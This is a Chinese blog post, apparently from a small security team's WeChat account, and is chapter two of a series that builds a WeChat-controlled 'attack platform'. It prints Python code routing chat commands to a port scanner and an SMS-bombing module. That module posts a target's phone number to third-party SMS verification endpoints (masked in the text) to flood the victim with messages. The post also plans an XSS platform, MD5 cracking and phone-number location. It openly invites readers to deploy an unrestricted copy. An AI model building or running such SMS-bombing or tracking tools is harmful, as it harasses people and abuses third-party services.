版权声明：

本文首发于微信号：inn0team

此文章版权归属于inn0team所有，转载请自觉保留以上版权声明

告知:

本公众号不提供非法用途，所以有些攻击手段，公众号内将会有诸多限制。如果想打造真正没有限制的攻击平台，请自申请公众号，源代码将会在下几章发布到github。

公众号短信攻击只在发布文章的30分钟内，开放超过该时间取消此功能。

公众号短信攻击只在发布文章的30分钟内，开放超过该时间取消此功能。

公众号短信攻击只在发布文章的30分钟内，开放超过该时间取消此功能。

目标：

•  短信攻击

• 网站扫描

•  端口扫描

• IP定位

• MD5破解

• xss平台

• …… (有什么需要添加的，请留言)

• （透露下，如果没有意外可能会加入手机号定位功能）

关于代码：

本套代码，将会在github 开源（采用 MIT 许可协议，可放心集成于商业产品中）。

开始打造

目录：

* 代表此次修改文件
|-- run.py #启动文件
|-- wechat #微信配置目录
|---- __init__.py 
|---- wechatConfig.py #微信配置验证，模块加载接口 *
|---- mode #模块目录
|------ __init__.py
|------ scanPort.py #端口扫描模块
|------ sendSMS.py #短信攻击模块 *

wechatConfig.py

#! /usr/bin/python
# -*- coding: utf-8 -*-
from flask import make_response
import hashlib
from mode import scanPort,sendSMS

def wechat_auth(token,data):
    signature = data.get('signature','')
    timestamp = data.get('timestamp','')
    nonce = data.get('nonce','')
    echostr = data.get('echostr','')
    s = [timestamp,nonce,token]
    s.sort()
    s = ''.join(s)
    if (hashlib.sha1(s).hexdigest() == signature):
        return make_response(echostr)

def wechat_mode(content):
    if content==u"攻击":
        return "G1:端口扫描nG2:短信攻击nn攻击格式：编号&目标n列如：G1&127.0.0.1n列如：G2&188****1111"
    elif  "G1&" in content:
        arr=content.split('&')
        return "你扫描的IP端口为："+str(scanPort.init(arr[1]))
    elif  "G2&"in content:
        arr=content.split('&')
        return "系统提示："+str(sendSMS.sendSMS(arr[1]))
    else:
        return "感谢你的留言！"

sendSMS.py:

#! /usr/bin/python
# -*- coding: utf-8 -*-
import urllib2
import urllib


#短信攻击接口1
def sendServer1(phone):
    data = {}
    data['mobile'] = phone
    #定义post的地址
    url = 'http://www.xxxxx.com/xxxx/xxxxxx'
    post_data = urllib.urlencode(data)
    #提交，发送数据
    try:
        req = urllib2.urlopen(url, post_data)
    except:
        print '异常'

#短信攻击接口2
def sendServer2(phone):
    data = {}
    data['mobile'] = phone
    #定义post的地址
    url = 'http://www.xxxxx.com/xxxx/xxxxxx'
    post_data = urllib.urlencode(data)
    #提交，发送数据
    try:
        req = urllib2.urlopen(url, post_data)
    except:
        print '异常'


def sendSMS(phone):
    sendServer1(phone)
    sendServer2(phone)
    return '发送成功！'

启动项目：

python run.py 

测试截图

inn0team只是一个正在成长的小的安全团队

微信号：inn0team

长按便可关注我们

本文始发于微信公众号（inn0team）：黑客微信攻击平台-第二章(短信攻击)